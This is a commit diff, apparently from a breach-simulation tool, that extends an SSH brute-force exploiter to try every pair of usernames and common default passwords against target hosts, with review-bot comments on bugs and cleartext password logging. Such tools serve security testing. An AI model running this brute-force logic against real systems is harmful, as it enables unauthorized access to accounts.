Issue #18, added ability to attack multiple users in SSH brute force.

Also fixed a small bug in Windows kill path parsing.
acepace 2016-08-08 22:25:33 +03:00
parent 2ed7cc359e
commit d75ce529ab
3 changed files with 22 additions and 16 deletions


@ -194,7 +194,7 @@ class Configuration(object):
psexec_passwords = ["Password1!", "1234", "password", "12345678"] psexec_passwords = ["Password1!", "1234", "password", "12345678"]
# ssh exploiter # ssh exploiter
ssh_user = "root" ssh_users = ["root"]
ssh_passwords = ["Password1!", "1234", "password", "12345678"] ssh_passwords = ["Password1!", "1234", "password", "12345678"]
# rdp exploiter # rdp exploiter


@ -39,7 +39,7 @@
"kill_file_path_linux": "/var/run/monkey.not", "kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\monkey.not", "kill_file_path_windows": "%windir%\\monkey.not",
"dropper_try_move_first": false, "dropper_try_move_first": false,
"exploiter_classes": [ "exploiter_classes": [
"SSHExploiter", "SSHExploiter",
@ -69,7 +69,9 @@
"serialize_config": false, "serialize_config": false,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
"skip_exploit_if_file_exist": true, "skip_exploit_if_file_exist": true,
"ssh_user": "root", "ssh_user": [
"root"
],
"local_network_scan": true, "local_network_scan": true,
"tcp_scan_get_banner": true, "tcp_scan_get_banner": true,
"tcp_scan_interval": 200, "tcp_scan_interval": 200,
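Review bot: The key in this file is still `"ssh_user"`, although its value is now a list and the same commit renames the Configuration attribute to `ssh_users`, which is what the exploiter reads via `self._config.ssh_users`. If the config loader maps JSON keys to attributes by name (the loader is not visible here), the list set in this file would never reach the exploiter and the class default would be used silently. Renaming the key to `"ssh_users": ["root"]` keeps the file and the code in agreement.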


@ -1,12 +1,13 @@
import paramiko import paramiko
import monkeyfs
import logging import logging
import time
from itertools import product
import monkeyfs
from tools import build_monkey_commandline from tools import build_monkey_commandline
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from network.tools import check_port_tcp from network.tools import check_port_tcp
import time
__author__ = 'hoffer' __author__ = 'hoffer'
@ -43,31 +44,34 @@ class SSHExploiter(HostExploiter):
return False return False
passwords = list(self._config.ssh_passwords[:]) passwords = list(self._config.ssh_passwords[:])
known_password = host.get_credentials(self._config.ssh_user) users = list(self._config.ssh_users)
if known_password is not None: known_passwords = [host.get_credentials(x) for x in users]
if known_password in passwords: if len(known_passwords) > 0:
passwords.remove(known_password) for known_pass in known_passwords:
passwords.insert(0, known_password) if known_pass in passwords:
passwords.remove(known_pass)
passwords.insert(0, known_pass) #try first
user_pass = product(users,passwords)
exploited = False exploited = False
for password in passwords: for user, curpass in user_pass:
try: try:
ssh.connect(host.ip_addr, ssh.connect(host.ip_addr,
username=self._config.ssh_user, username=user,
password=password, password=curpass,
port=port, port=port,
timeout=None) timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)", LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, self._config.ssh_user, password) host, user, curpass)
host.learn_credentials(self._config.ssh_user, password) host.learn_credentials(user, curpass)
exploited = True exploited = True
break break
except Exception, exc: except Exception, exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", host, " %s and password '%s': (%s)", host,
self._config.ssh_user, password, exc) user, curpass, exc)
continue continue
if not exploited: if not exploited:
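Review bot: `known_passwords = [host.get_credentials(x) for x in users]` drops the `is not None` check the old code had, and `len(known_passwords) > 0` is true whenever `users` is non-empty, so a user with no stored credential contributes `None`; if `passwords.insert(0, known_pass)` sits outside the `in passwords` test as it did before (indentation is lost in this view), that `None` ends up in the list passed to `ssh.connect`. Filtering first avoids it: `known_passwords = [p for p in (host.get_credentials(u) for u in users) if p is not None]`. The association between a known password and its user is also lost, since `product(users, passwords)` pairs every stored password with every user. Separately, both `LOG.debug` calls still write the cleartext password to the log, so working credentials end up in log files; logging `user` alone would avoid that. The function body starts and ends outside this hunk.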